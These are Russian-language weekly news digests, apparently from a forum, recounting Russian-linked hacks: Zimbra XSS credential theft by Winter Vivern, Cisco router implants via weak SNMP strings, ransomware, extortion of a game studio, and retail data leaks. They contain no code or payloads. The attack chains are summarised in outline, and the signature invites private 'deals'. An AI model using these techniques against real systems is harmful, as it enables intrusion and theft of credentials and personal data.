Марк Кортхаус из берлинской компании по информационной безопасности Sys11 сообщил газете Frankfurter Allgemeine, что атаки становятся все более политизированными. По словам Кортхауса, когда в этом месяце Германия приняла решение поставить Украине танки Leopard 2, количество атак на немецкие цели резко возросло.

«Атаки — предупредительный сигнал, и мы должны отнестись к этому серьезно». По его словам, за более простыми атаками часто следовали более технически сложные, причем первоначальные атаки часто рассматривались хакерами как «прощупывание почвы».

Александр Вуккевич, директор лабораторий защиты компании по информационной безопасности Avira: «Каждый раз, когда Европа усиливает свои санкции против России или ускоряет помощь Украине, хакеры усиливают свои атаки».

https://i.gyazo.com/cba742ccefbbdfefa21da212b1f669ef.png



Когда Бундестаг проголосовал за поставки танков, была аналогичная активность, хотя парламент смог отразить атаки на свою собственную сеть. Во время Мюнхенской конференции по безопасности, на которой главной темой обсуждения было российское вторжение в Украину, хакеры атаковали ИТ-системы НАТО. Когда Болгария заявила, что поддерживает Украину, Killnet атаковала правительственные компьютеры в Софии, сказал Вуккевич.

Заключение

Похоже, что российские хакеры перешли в режим полной боевой готовности. Атаки на Германию становятся все более точными и болезненными для инфраструктуры страны.

В своих сообщениях хакерские группировки уточняют, что действуют лишь по политическим причинам. Разрушение привычной жизни жителей Германии является следствием действий их правительства. Команда BlackMast внимательно следит за развитием ситуации и каждую неделю рассказывает о новых кибератаках русских хакеров.

https://i.gyazo.com/f180404d97933483fded7b5d668b4dd6.jpgКак США пытаются защититься от русских хакеров
Вступить в наш чат
Белый дом в четверг 2 марта объявил о новой стратегии кибербезопасности в рамках недавних усилий правительства США по укреплению своей киберзащиты. Усиление безопасности потребовалось на фоне неуклонного роста хакерских атак и цифровых преступлений, направленных против страны.
https://i.gyazo.com/5a587b9ac6e3f9b4f491e8fd01420aff.pngСуть стратегии:
Стратегия призывает к более жесткому регулированию существующих практик кибербезопасности в различных отраслях и улучшению сотрудничества между правительством и частным сектором. Это произошло после серии громких хакерских инцидентов, совершенных против Соединенных Штатов, и на фоне военного конфликта между Россией и Украиной, в котором кибервойна занимает сейчас важную роль.

Стратегия называет Китай и Россию наиболее серьезными угрозами кибербезопасности для Соединенных Штатов. Во время разговора с журналистами официальный представитель США, который отказался назвать свое имя, сказал, что часть новой стратегии направлена на обуздание российских хакеров.



«Россия де-факто служит убежищем для киберпреступников, и программы-вымогатели — основная проблема, которой мы занимаемся сегодня», — сказал представитель власти.


https://i.gyazo.com/7be607b2a81b7ca934d81eb2a9e839e1.pngИз-за чего появилась необходимость в дополнительных мерах защиты:
Атаки программ-вымогателей, в ходе которых киберпреступные группировки захватывают контроль над системами цели и требуют выплаты выкупа, относятся к наиболее распространенным типам кибератак и в последние годы затронули широкий спектр отраслей.



«Система уголовного правосудия не сможет самостоятельно решить эту проблему — нам нужно обратить внимание на другие элементы нашей власти», — добавил чиновник. «Поэтому мы надеемся, что Россия понимает последствия злонамеренной деятельности в киберпространстве и перестанет угрожать нашим системам».


Как будет внедряться новая стратегия:
Стратегия призывает к созданию коалиций с иностранными партнерами, «чтобы оказать давление на Россию и других злоумышленников, чтобы они изменили свое поведение», — сказал второй официальный представитель США, принявший участие в телефонном разговоре, который также отказался назвать



«Я думаю, что за последний год мы добились определенного успеха в создании этих коалиций», — добавил чиновник.


Среди прочего, стратегия призывает к улучшению стандартов исправления уязвимостей в компьютерных системах и реализации указа, который потребует от облачных компаний проверять личность иностранных клиентов.
https://i.gyazo.com/06a345754bee704162174e00d79f7a31.pngЗаключе ние
Похоже, что правительство США серьезно настроено на улучшение своей кибербезопасности. В лице русских хакеров США видит опасность, способную нанести серьезный вред государству.

Как отреагируют русские хакеры, и как быстро они смогут обойти новые защиты? Команда BlackMast с интересом следит за развитием событий, новый выпуск Дневников Даркнета уже через неделю!

https://i.gyazo.com/e68b2d5245d280b9011c0388d4cc0014.jpgКак русские хакеры взломали украинскую видеоигру
Вступить в наш чатУтечки происходят в интернете. Так же и взломы. Когда в наши дни две страны воюют друг с другом, кибератак обычно становится все больше. Тем не менее, утечки остаются утечками, и если к ним подойти правильно, они не будут иметь большого значения. Или они могут стать способом получения большей поддержки со стороны клиентов или фан-базы.
Давайте поговорим о том, как российская хакерская группа взломала системы украинского разработчика GSC Game World, студии, создавшей серию видеоигр Stalker
https://i.gyazo.com/46ef5d4f5d4e2b3fc1c52f790a4e94bd.png

Что произошло
11 марта на российской фан-странице серии Stalker появился пост, в котором говорилось, что взломали Stalker 2, находящуюся в разработке, и начали угрожать украинским разработчикам игры. Эти разработчики теперь ответили и, по сути, сказали им идти к черту.
Пост и взлом, по-видимому, являются ответом на решение разработчиков GSC Game World не локализовать грядущий шутер для российского рынка, а также на то, как российские члены сообщества серии обращаются с российскими членами сообщества после последнего вторжения их страны в Украину. Хакеры просят GSC «пересмотреть свое отношение к игрокам из Беларуси и России» и «принести извинения за недостойное отношение к обычным игрокам из этих стран».
Касаемо отсутствия русской локализации пишут «Фанаты ждут от вашей официальной компании. Не надо портить людям игру из-за политики».
По словам хакерской группы, если их запросы не будут удовлетворены, они выпустят тонну украденных данных. Это включает в себя иллюстрации, детали, изображения и все виды другого контента для невыпущенной игры Stalker 2, выпуск которой намечен на конец этого года.

https://i.gyazo.com/d719f87e5d0e6f1c50afc63d9b291a71.png

Ответ украинских разработчиков
Как вы можете себе представить, это никогда не бывает веселой ситуацией для создателей контента. Весь этот контент может влиять на завершенную игру на том или ином уровне, но он почти наверняка не полностью отражает то, чем будет законченная игра. Вы можете себе представить, что GSC очень разозлилась из-за того, что это произошло, и очень обеспокоена впечатлением, которое выпущенный контент может оставить у будущих покупателей игры. Многие студии в таких случаях вели переговоры с хакерами, чтобы контент не был опубликован.
Или, если вы GSC, вы говорите что-то вроде: "Русские хакеры, идите к черту". Нижеследующее взято из заявления, опубликованного GSC:


МЫ УКРАИНСКАЯ КОМПАНИЯ, И, КАК БОЛЬШИНСТВО УКРАИНЦЕВ, МЫ ПЕРЕЖИВАЛИ МНОГО ГОРАЗДО УЖАСАЮЩИХ ВЕЩЕЙ: РАЗРУШЕННЫЕ ДОМА, РАЗРУШЕННЫЕ ЖИЗНИ И СМЕРТИ НАШИХ БЛИЗКИХ. ПОПЫТКИ ШАНТАЖАТЬ ИЛИ ЗАПУГАТЬ НАС АБСОЛЮТНО БЕСПОЛЕЗНЫ.





НАША ПОСТОЯННАЯ ПРИВЕРЖЕННОСТЬ ПОДДЕРЖИВАТЬ НАШУ СТРАНУ ОСТАЕТСЯ НЕИЗМЕННОЙ – МЫ БУДЕМ ПРОДОЛЖАТЬ ДЕЛАТЬ ВСЕ ВОЗМОЖНОЕ ДЛЯ ПОДДЕРЖКИ УКРАИНЫ. И ЭТО НЕ ИЗМЕНИТСЯ В БУДУЩЕМ НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ.


Итак, GSC решает, что утечки не так страшны, по крайней мере, не настолько, чтобы сдаться.


В СЛУЧАЕ УТЕЧКИ ПРОСИМ ВАС ВОЗДЕРЖАТЬСЯ ОТ ПРОСМОТРА ИЛИ РАСПРОСТРАНЕНИЯ ИНФОРМАЦИИ О S.T.A.L.K.E.R. 2: СЕРДЦЕ ЧЕРНОБЫЛЯ. УСТАРЕВШИЕ И НЕЗАВЕРШЕННЫЕ МАТЕРИАЛЫ МОГУТ РАЗБАВИТЬ ВПЕЧАТЛЕНИЕ ОТ ОКОНЧАТЕЛЬНОЙ ИДЕИ, КОТОРУЮ МЫ ВЛОЖИЛИ В ИГРУ. МЫ ПРИЗЫВАЕМ ВАС НАБРАТЬСЯ ТЕРПЕНИЯ И ДОЖДАТЬСЯ ОФИЦИАЛЬНОГО ВЫПУСКА ДЛЯ НАИЛУЧШЕГО ВОЗМОЖНОГО ОПЫТА. МЫ ВЕРИМ, ЧТО ВАМ ЭТО ПОНРАВИТСЯ.





МЫ ХОТИМ ВЫРАЖАТЬ НАШУ ГЛУБОКУЮ ПРИЗНАТЕЛЬНОСТЬ НАШЕМУ ЛОЯЛЬНОМУ СООБЩЕСТВУ. МЫ ПОРАЖЕНЫ ОТВЕТОМ И ПОДДЕРЖКОЙ, КОТОРЫЕ МЫ ПОЛУЧИЛИ ОТ ВАС. СПАСИБО ВАМ ЗА ЭТО. ОТ КАЖДОГО ЧЛЕНА GSC GAME WORLD TEAM.





https://i.gyazo.com/23c6889d29e1f7267f62149d00e243d6.png

Заключение
Следующий шаг за русскими хакерами. Обнародуют ли они материалы игры? Справедливы ли требования хакеров и правильны ли действия украинских разработчиков? Команда BlackMast следит за развитием событий, оставайтесь с нами.

Microsoft назвала хакерскую группировку, которая следующей атакует Украину

https://i.gyazo.com/28ff5bf97ec419bf57d36c1b8abc7da6.jpg

Вступить в наш чат"Российские хакеры, по-видимому, готовят новую волну кибератак против Украины, в том числе угрозу "по типу программ-вымогателей" для организаций, обслуживающих украинские линии снабжения", — говорится в исследовательском отчете Microsoft
Что произошло
В отчете, подготовленном группой по исследованиям и анализу кибербезопасности Microsoft, излагается ряд новых фактов о том, как российские хакеры действуют во время конфликта на Украине и что может произойти дальше.

«С января 2023 года Microsoft наблюдает, как российские киберугрозы приспосабливаются к усилению деструктивных и разведывательных возможностей в отношении гражданских и военных активов Украины и ее союзников», — говорится в отчете. Специалисты считают, что одна известная пророссийская группировка «кажется, готовится к новой разрушительной кампании».

Посольство России в Вашингтоне не сразу ответило на запрос о комментарии. Эксперты говорят, что тактика сочетания физических военных операций с киберметодами отражает предыдущую деятельность России.

«Сочетание кибератак с попытками нарушить или лишить обороняющихся возможности координировать действия и использовать киберзависимые технологии — не новый стратегический подход», — сказала Эмма Шредер, заместитель директора инициативы Cyber Statecraft Атлантического совета.

https://i.gyazo.com/7a1df1e12c87bee2602c10c2e9e3de44.png

Кто за этим стоитMicrosoft обнаружила, что особенно опытная российская хакерская группа, известная в сообществе исследователей кибербезопасности как Sandworm (она же Telebots, BlackEnergy, Voodoo Bear), тестировала «дополнительные возможности в стиле программ-вымогателей, которые можно было бы использовать для разрушительных атак на организации за пределами Украины, которые выполняют ключевые функции в линиях снабжения Украины».

Что касается данной группировки, их называют «правительственными» хакерами. Sandworm стоит за длившейся три года операцией, в результате которой был взломан ряд французских организаций, использующих мониторинговое ПО Centreon.

Атака программ-вымогателей обычно связана с проникновением хакеров в организацию, шифрованием их данных и вымогательством платы за восстановление доступа. Исторически программы-вымогатели также использовались в качестве прикрытия для более злонамеренной киберактивности, включая так называемые вайперы, которые просто уничтожают данные.

https://i.gyazo.com/3a055316f32163e0aed1b4b35aef78ff.png

Были ли другие атакиС января 2022 года Microsoft заявила, что обнаружила как минимум девять различных вайперов и два типа вариантов программ-вымогателей, которые использовались против более чем 100 украинских организаций.

Согласно отчету, эти события сопровождаются ростом более скрытных российских киберопераций, направленных на прямую компрометацию организаций в странах, являющихся союзниками Украины.

«В странах Америки и Европы, особенно в соседних с Украиной странах, российские злоумышленники пытались получить доступ к правительственным и коммерческим организациям, участвующим в усилиях по поддержке Украины», — сказал Клинт Уоттс, генеральный менеджер Центра анализа цифровых угроз Microsoft.

https://i.gyazo.com/952ad9716db5b541e1fee37bf71260ec.png

ЗаключениеС каждым днем заявлений о том, что российские хакеры готовятся к атаке на Украину становится больше. Данный отчет Microsoft говорит о том, что внимание властей сейчас приковано к киберпреступникам.

Команда BlackMast следит за развитием ситуации. Судя по усилению напряжения, совсем скоро мы узнаем о новой кибератаке от русских хакеров.

__________________

Мои контакты : https://t.me/M_A_S_T_E_R_D_M все сделки подтверждайте через ЛС
https://i.gyazo.com/d19a163e1e638720973b0225e76a7354.gif

Как хакеры Winter Vivern крадут письма НАТО

https://i.gyazo.com/581cb85f830639e18b0b0baa2411a4c4.jpg



Вступить в наш чат
Русскоязычная хак-группа Winter Vivern активно использует уязвимость в Zimbra и с февраля 2023 года похищает письма официальных лиц НАТО, правительств, военнослужащих и дипломатов.

Кампания, которая также нацелена на официальных лиц европейских стран, использует вредоносный JavaScript, настроенный для отдельных порталов веб-почты, принадлежащих различным организациям, связанным с НАТО.

Winter Vivern отслеживаетcz Proofpoint с 2021 года под именем TA473, использует постоянную разведку и тщательные исследования для создания скриптов, которые крадут имена пользователей, пароли и другие конфиденциальные учетные данные целей на каждом общедоступном портале веб-почты, на который нацелены.

https://i.gyazo.com/ccbed1e0a86f24808970f7e19f3784e7.png

Как это работает«Эта хакерская группировка упорно преследует американских и европейских официальных лиц, а также военных и дипломатов в Европе», — написал в электронном письме исследователь угроз Proofpoint Майкл Рагги.

«С конца 2022 года TA473 потратил достаточно времени на изучение почтовых веб-порталов европейских государственных органов и сканирование общедоступной инфраструктуры на наличие уязвимостей, чтобы в конечном итоге получить доступ к электронной почте тех, кто тесно связан с государственными делами и российско-украинскими военными отношениями".

Рагги отказался назвать цели, заявив, что среди них были выборные официальные лица США и сотрудники на уровне федерального правительства, а также европейские организации.

«В ряде случаев как в США, так и в Европе лица, на которые нацелены эти фишинговые кампании, открыто поддерживают Украину в российско-украинской войне и/или участвуют в инициативах, касающихся поддержки Украины на международной арене», — добавил он.

Большинство недавних атак, обнаруженных Proofpoint, использовали уязвимость в устаревших версиях Zimbra Collaboration, программного пакета, используемого для размещения порталов веб-почты. Уязвимость, отслеживаемая как CVE-2022-27926 и исправленная в марте прошлого года, представляет собой недостаток межсайтового скриптинга, который позволяет злоумышленникам, не прошедшим проверку подлинности, выполнять вредоносные веб-скрипты на серверах, отправляя специально созданные запросы. Атаки работают только против серверов Zimbra, на которых еще не установлено исправление.

Атака начинается с использования инструментов сканирования, таких как Acunetix, для выявления незакрытых порталов, принадлежащих интересующим группам. Затем члены TA473 рассылают фишинговые электронные письма, якобы содержащие информацию, представляющую интерес для получателей.

https://i.gyazo.com/e86aff9a79d294abc90e078f1f7f5338.png

Фишинговое письмоЭлектронные письма отправляются со скомпрометированных адресов электронной почты, которые часто исходят от неисправленных или иным образом уязвимых доменов, размещенных на WordPress. Отправитель электронных писем подделывается, чтобы он выглядел как человек или организация, с которой цель взаимодействует во время обычной работы. Тело электронных писем содержит безобидный URL-адрес, но при нажатии гиперссылка приводит к URL-адресу, на котором размещен JavaScript, использующий уязвимость Zimbra.

Этот сценарий первого этапа загружает сценарий JavaScript второго этапа, адаптированный для отдельного веб-портала, выполняющего подделку межсайтовых запросов. Этот CSRF захватывает имя пользователя, пароль и токен аутентификации цели. Чтобы скрыть себя, вредоносный код JavaScript включает легитимный код JavaScript, который выполняется на собственном портале веб-почты.
https://i.gyazo.com/ad724c5575fd479d5b85f2523fc08a6a.png

Схема атаки

Чем выделяются Winter Vivern
Исследователи из других фирм, занимающихся безопасностью, отслеживают TA473 как Winter Vivern, имя, придуманное исследователями из DomainTools и взятое из пути к файлу, который является ранней частью вредоносного ПО группы, используемого при работе с управляющими серверами.

Исследователи из фирм Lab52 и SentinelLabs (кибербезопасность) также изучили профиль группы. Все четыре фирмы, изучившие Winter Vivern, считают: нехватку финансирования и передовых технологий группа компенсирует настойчивостью и глубокими исследованиями.

«Хотя TA473 не является лидером по сложности среди APT-угроз, нацеленных на европейский киберпространство, они демонстрируют сосредоточенность, настойчивость и повторяемость процесса компрометации геополитически уязвимых целей», — пишет Proofpoint.

Еще три недели назад сообщалось, что русскоязычная группировка Winter Vivern замечена в атаках на государственные учреждения в нескольких странах Европы и Азии, а также на поставщиков телекоммуникационных услуг.
https://i.gyazo.com/e3de2765bf63872cc140e05668fe18cb.png

Заключение
Хакеры из Winter Vivern придерживаются простого и эффективного подхода, который работает даже против важных целей, которые не способны своевременно устанавливать обновления и патчи. Они действуют медленно, но верно.

Наша команда внимательно следит за развитием событий и каждую неделю сообщает о самых громких кибератаках русских хакеров.

Российские хакеры нашли необычный способ слежки за военной техникой

https://i.gyazo.com/19ccbfcc8aaee0a0904668cca15753fa.jpg

Российские хакеры подключались к частным камерам наблюдения в украинских кофейнях, чтобы собирать информацию о проходящих колоннах с гуманитарной помощью, заявил во вторник высокопоставленный сотрудник службы безопасности США.

https://i.gyazo.com/569eb499ff1b58b29913218f8bb9eea8.png

Что произошло
Роб Джойс, директор по кибербезопасности Агентства национальной безопасности, заявил, что российское правительство и хакеры, поддерживаемые правительством, продолжают атаковать украинские системы информационных технологий в рамках своего вторжения в страну.

По его словам, одним из направлений являются камеры видеонаблюдения, используемые местными властями и частными предприятиями для наблюдения за своим окружением.

«Продолжаются атаки на украинские интересы, будь то финансовые, правительственные, личные, частные предприятия», — сказал Джойс в Центре международных и стратегических исследований в Вашингтоне.

«Мы наблюдаем, как российские хакеры подключаются к общедоступным веб-камерам, чтобы наблюдать за колоннами и поездами, доставляющими помощь», — сказал Роб Джойс.

https://i.gyazo.com/6b6833cfa93fe80f4bb7e678e591e674.png
Чиновник АНБ назвал некоторых российских хакеров «креативными», комментируя их способ добывания информации.

«Они действуют креативно. Мы наблюдаем, как российские хакеры подключаются к показывающим посетителей веб-камерам, чтобы следить за колоннами и поездами, доставляющими помощь , а вместо того, чтобы пользоваться камерами на городских площадях, они выискивают камеры слежения в кафе, чтобы видеть нужную им дорогу», — сказал он.

Буду ли еще атаки
По его словам, русские также сосредоточили свои усилия по взлому американских оборонных производителей и логистических транспортных компаний, чтобы узнать больше о цепочке поставок оружия в Украину.

«Они испытывают ежедневное давление со стороны россиян», — сказал Роб Джойс.

https://i.gyazo.com/f2f80f7d6eefdfc054bd7dee7a8ea204.png

Заключение
Судя по недавним новостям, российские хакеры все ближе подходят ко взлому американских оборонных производителей и логистических транспортных компаний. Не исключено, что в скором времени у взломщиков появится гораздо больше информации.

Команда BlackMast внимательно следит за развитием событий и каждую неделю рассказывает о самых интересных взломах и кибератаках со стороны российских хакеров.

https://i.gyazo.com/7b21e2d5842c560c3d92b583d12553ae.jpg

Вступить в наш чат

Гражданин России Денис Дубников, соучредитель криптовалютных бирж EggChange и Crypto Coyote, недавно признал себя виновным по обвинениям, связанным с отмыванием денег для вымогательской группировки Ryuk. Теперь Дубникову вынесли приговор: уже отбытый тюремный срок и штраф в размере 2000 долларов.

В этой статье вспомним о самом обсуждаемом вымогателе, нашумевшем в бизнес-среде, а также расскажем, как Дубникову удалось смягчить наказание за отмыв более 400 000 долларов доходов.

Что произошло

Денис Дубников — соучредитель криптовалютных бирж EggChange и Crypto Coyote. В 2021 году был арестован при попытке провести отпуск в Мексике. Ему отказали во въезде в страну и направили в Нидерланды, где Дубникова официально задержала голландская полиция по запросу ФБР.

В результате, в августе 2022 года Дубникова экстрадировали в США, за то, что он помогал хакерам-вымогателям обналичивать криптовалюту. Через его счета были отмыты более 400 000 долларов, связанные с деятельностью шифровальщика Ryuk.

Согласно обвинительному акту, Дубников был среди брокеров, которые помогали Ryuk отмывать выплаты программ-вымогателей, разделяя платежи на несколько меньших сумм, переводя их между собственными кошельками, а затем обменивая биткойны (BTC) на Tether (USDT), другие криптовалюты и фиат, в основном китайский юань.

https://i.gyazo.com/0bec14728f1e0105f0912f5c00010a3d.png

Шифровальщик Ryuk

Ryuk — один из самых нашумевших вариантов шифровальщиков за последние несколько лет. С тех пор как он впервые появился летом 2018 года, он собрал внушительный список жертв, особенно в бизнес-среде, которая является главным объектом его атак.

Вымогатель шиф*рует фай*лы и тре*бует у жер*твы выкуп в крип*товалю*те Bitcoin за пре*дос*тавле*ние клю*чей для дешиф*ровки. ИБ-исследователи из компаний Advanced Intelligence и HYAS подсчитали, что «доход» операторов малвари Ryuk суммарно насчитывает более 150 000 000 долларов в биткоин-эквиваленте. Отмыть часть из дохода как раз помог Денис Дубников.

https://i.gyazo.com/06e2534b119d32adaeb338d1035d260d.png

ак удалось смягчить приговор за отмыв

В случае признания виновным Дубников провел бы в тюрьме до 20 лет, а также тремя годами условно-досрочного освобождения и штрафом в размере до 500 000 долларов США.

В феврале 2023 года Дубников признал себя виновным по одному пункту обвинения (в заговоре с целью отмывания денег), а 11 апреля его приговорили к уже отбытому сроку и выплате компенсации в размере 10 000 долларов США.

Отмечается, что суд также обязал россиянина соблюдать условия надзора, в том числе регулярно отмечаться в полиции, сдавать анализы на ********* и добровольно предоставлять образцы ДНК по запросу властей.

https://i.gyazo.com/8459c10b49751e821295354462d881d6.png

__________________

Российские хакеры взламывают оборудование Cisco

https://i.gyazo.com/1bb3827f961076ae73db3c834dc84bc3.jpg

Вступить в наш чатВласти США, Великобритании, а также эксперты компании Cisco предупредили о том, что российские «правительственные» хакеры из группировки APT28 (она же Fancy Bear, STRONTIUM, Sednit и Sofacy) взламывают их устройства. Хакеры внедряют специальную малварь, Jaguar Tooth, в Cisco IOS на маршрутизаторах компании, что позволяет им получать доступ к устройствами без аутентификации.
В этой статье разберемся, как происходит взлом и какую опасность он несет.

Что произошло
18 апреля британский Национальный центр кибербезопасности (NCSC), Агентство США по кибербезопасности и безопасности инфраструктуры (CISA), АНБ и ФБР опубликовали отчет, где сообщили, что хакерская группировка APT28 использует уязвимость для разведки и развертывания вредоносных программ на маршрутизаторах Cisco.

https://i.gyazo.com/82a0c696d5f22f5b694dacae5163cf9e.png



Что такое Cisco
Cisco Systems, «Сиско Системз» — американская транснациональная компания, разрабатывающая и продающая сетевое оборудование, предназначенное в основном для крупных организаций и телекоммуникационных предприятий. Также разрабатывает программное обеспечение в сфере информационной безопасности.
Взламывая устройства Cisco, хакеры получают доступ к следующим функциям маршрутизаторов:


показать текущую конфигурацию;

показать версию;

показать бриф интерфейса ip;

показать arp;

показать соседей cdp;

показать старт;

показать IP-маршрут;

показать флеш.
https://i.gyazo.com/1b0b088c0198d4669c46fca0adbed746.png


Как происходит взлом
Малварь под названием Jaguar Tooth внедряется непосредственно в память маршрутизаторов Cisco со старыми версиями прошивки, используя для этого SNMP. После установки малварь извлекает информацию из маршрутизатора и обеспечивает своим операторам неавторизованный бэкдор-доступ к устройству.
Взлом не несет в себе сенсационный характер, это обычная ошибка удаленного выполнения кода без аутентификации, для которой давно существует общедоступный эксплоит. Однако на многих устройствах Cisco стоят древние прошивки, неспособные защитить маршрутизатор.
Получив доступ к маршрутизатору Cisco, злоумышленники «патчат» его память, чтобы установить кастомную непостоянную малварь Jaguar Tooth. Как объясняют в NCSC, это дает хакерам доступ к существующим локальным учетным записям без проверки пароля (при подключении через Telnet или физический сеанс).



Заключение
Известно, что APT28 получает доступ к уязвимым маршрутизаторам, используя стандартные и слабые строки сообщества SNMP, а также используя CVE-2017-6742. В своем отчете Cisco напоминает администраторам о необходимости своевременного обновления маршрутизаторов до последней версии прошивки.
Команда BlackMast продолжает следить за новыми взломами от русских хакеров. Уже на следующей неделе узнаем, как работает новый вирус-вымогатор или нашумевшая DDoS-атака.

https://i.gyazo.com/9d8ad94691324250a1acf3a769b2bdc3.png

https://i.gyazo.com/2e8994768bf33e535651e0fc4ba689e8.jpg

Вступить в наш чат

По данным властей США, ФБР уничтожило вредоносное ПО, известное как Snake, которое использовалось в кибершпионаже российской службой безопасности ФСБ. Как это произошло, узнаем в нашей статье.

Чиновники ФБР запустили операцию «Медуза», в ходе которой было выявлено и обезврежено вредоносное ПО, нацеленное на огромное количество американских компьютеров. Вредоносное ПО считалось «главным инструментом шпионажа». Между тем ответственные российские хакеры, известные как группа Turla, были названы одними из самых опытных в этом направлении.

Что произошло

Власти США заявили, что ФБР саботировало набор вредоносных программ, используемых элитными российскими шпионами, что все больше пролило свет на цифровое перетягивание каната между двумя кибер-сверхдержавами.

Высокопоставленные сотрудники правоохранительных органов заявили, что технические эксперты ФБР выявили и обезвредили вредоносное ПО, используемое российской службой безопасности ФСБ, против нераскрытого числа американских компьютеров. Они надеялись, что этот шаг нанесет смертельный удар одной из ведущих российских программ кибершпионажа.

«Мы оцениваем это как их главный инструмент шпионажа», — сказал журналистам один из официальных лиц США перед публикацией. Он сказал, что Вашингтон надеется, что операция «уничтожит страну с виртуального поля боя».

https://i.gyazo.com/f3c2e252c3b5982e52c0fb5563c9dca3.png

Кто за этим стоит

Чиновник сказал, что шпионы ФСБ, стоящие за вредоносной программой, известной как Snake, являются частью печально известной хакерской группы Turla.

По словам высокопоставленного сотрудника ФБР, группа в течение двух десятилетий активно действовала против различных целей, связанных с НАТО, правительственных учреждений США и технологических компаний.

Российские дипломаты не сразу ответили на сообщение с просьбой прокомментировать ситуацию. Москва регулярно отрицает проведение операций кибершпионажа.

Официальные лица США поговорили с журналистами перед выпуском новостей при условии, что их имена не будут названы. Аналогичные заявления, раскрывающие усилия ФСБ по киберподрыву, были сделаны службами безопасности Великобритании, Канады, Австралии и Новой Зеландии.

Turla считается одной из самых опытных хакерских команд, изученных сообществом исследователей безопасности.

«Они оставались в тени, сосредоточившись на скрытности и оперативной безопасности», — сказал Джон Халтквист, вице-президент по анализу угроз в американской компании по кибербезопасности Mandiant. «Они — одна из самых сложных целей, которые у нас есть».

https://i.gyazo.com/6b55b77520c81277f5bc584b65fbc461.png

Как удалось обезвредить ПО

Правительство США назвало уничтожение вредоносного ПО Turla Snake «Операция Медуза». ФБР и его партнеры определили, где в Интернете был развернут хакерский инструмент, и создали уникальную программную «полезную нагрузку», чтобы нарушить хакерскую инфраструктуру.

ФБР полагалось на существующие органы, выдающие ордера на обыск, для удаленного доступа к российской вредоносной программе в сетях жертв в США и разъединения ее соединений.

Высокопоставленный сотрудник ФБР сказал, что инструмент был разработан специально для связи с российской шпионской программой. «Он говорит на языке Snake и общается с помощью пользовательских протоколов Snake, не получая доступа к личным файлам жертвы», сказал чиновник.

https://i.gyazo.com/b93c2688174e1c38b1c992b16bc3c6f8.png

__________________

Русские хакеры украли данные 237 000 государственных служащих США

https://i.gyazo.com/e0608266bc754b96135b3d351b10a63e.jpg

Вступить в наш чатУтечка коснулась систем обработки льгот на проезд TRANServe, которые возмещают государственным служащим некоторые расходы на поездки. Неясно, использовалась ли какая-либо личная информация в преступных целях.

В этой статье узнаем подробнее о деталях взлома.

Что произошло
Личная информация 237 000 нынешних и бывших служащих федерального правительства была раскрыта в результате утечки данных в Департаменте транспорта США (USDOT).

Министерство транспорта США уведомило Конгресс в электронном письме, что его первоначальное расследование утечки данных «изолировало утечку в определенных системах в отделе, используемом для административных функций, таких как обработка льгот для сотрудников».

Департамент расследует нарушение и заморозил доступ к системе льгот на проезд до тех пор, пока она не будет защищена и восстановлена, говорится в сообщении.

https://i.gyazo.com/20a400a08495d9cee15b5092421ffc35.png

Ущерб от взлома и кто за ним стоитМаксимальное пособие составляет 280 долларов в месяц на оплату проезда на общественном транспорте федеральных служащих. Утечка затронула 114 000 нынешних сотрудников и 123 000 бывших сотрудников.

Правительственный источники сообщают, что во взломе обвиняются пророссийские хакеры. Пока ни одна группировка не взяла на себя ответственность за утечку, однако, сообщается, что правительство уже обозначило круг подозреваемых.

https://i.gyazo.com/c38c5ed143d8f75e29556441e2b97681.png

Были ли подобные атаки
Государственные служащие и ранее подвергались взломам. Две утечки в Министерстве по управлению персоналом США (OPM) в 2014 и 2015 годах скомпрометировали конфиденциальные данные, принадлежащие более чем 22 миллионам человек, включая 4,2 миллиона нынешних и федеральных служащих, а также данные отпечатков пальцев 5,6 миллиона из этих лиц.

Подозреваемые российские хакеры, которые использовали программное обеспечение SolarWinds и Microsoft для проникновения в федеральные агентства США, взламывали незасекреченные сети Министерства юстиции и читали электронные письма в министерствах финансов, торговли и внутренней безопасности. По сообщению журналистов в 2021 году, были взломаны девять федеральных агентств.

https://i.gyazo.com/3f03748306cc19691f9fa114ca590ac6.png

Как хакеры пошли по магазинам и слили клиентские данные ритейлеров


https://i.gyazo.com/cefc97f9d1a6c395489e33d166c1a99c.jpg

Хакер, который опубликовал ранее данные клиентов сервисов «Сбера», снова отличился. На этот раз в сеть попали клиентские базы гипермаркетов «Ашан» и «Твой дом», а также сети Gloria Jeans, содержащие имена, номера телефонов и адреса доставки товаров. В этой статье подробно разберем данный взлом.

Что произошло
ИБ-специалисты Data Leakage & Breach Intelligence (DLBI) сообщили, что в сети опубликованы базы данных с информацией о клиентах торговых сетей «Ашан» и «Твой Дом». В открытый доступ попали данные 7,8 млн клиентов «Ашана» и около 700 000 клиентов гипермаркетов «Твой Дом». Вероятнее всего, хакер попал в системы сервисов в мае этого года.

https://i.gyazo.com/ddee9af1d3f11466915f16d1522e5bcc.png

Масштаб трагедии
Данные «Ашана» представлены в текстовых файлах, содержащих 7 840 297 строк, среди которых:


имя/фамилия;

телефон (7,7 млн уникальных номеров);

email-адрес (4,7 млн уникальных адресов);

адрес доставки или самовывоза (777 000 адресов);

дата создания и обновления записи (с 13 апреля 2020 по 18 май 2023).
Данные «Твой Дом» опубликованы в виде дампа таблицы пользователей из CMS Bitrix. Суммарно утечка насчитывает 713 365 строк, включая:


имя/фамилию;

телефон (618 300 уникальных номеров);

email-адрес (389 500 уникальных адресов);

хешированный (с солью) пароль;

пол (не для всех);

дата рождения (не для всех);

дата создания и обновления записи (с 21 января 2019 по 18 мая 2023).
Кто ответственен за слив
Этот слив связывает с тем же хакером, что слил в сеть клиентские данные «СберСпасибо», «СберПрава», «СберЛогистики», GeekBrains и так далее.


«База опубликована в принадлежащем взломщику Telegram-канале, данные открыты для публичного доступа, что свидетельствует об их бесполезности для самого хакера»,— пояснил основатель DLBI Ашот Оганесян.


Хакер угрожает, что в дальнейшем сольет базы данных 12 крупных компаний, пока известно о девяти жертвах. Никакие требования или информацию о выкупе хакер не сообщает.

https://i.gyazo.com/8b0dac230eddcf5b01c49c0bb5bb11e7.png



Как хакер получил данные
В DLBI полагают, что источником утечки данных «Твой дом» могла стать система «1C-Битрикс» — как через уязвимость, так и через получение доступа к резервной копии сервера базы данных или ему самому. По данным сайта «1С-Битрикс», гипермаркет «Твой дом» есть в числе компаний, создавших корпоративный сайт на платформе.
Возможно, для Ашана точка входа была иной, так как слив выложен в другом формате.

https://i.gyazo.com/e9c97a9c10f3714f25fd8275d3e37df9.png

Реакция слитых компаний
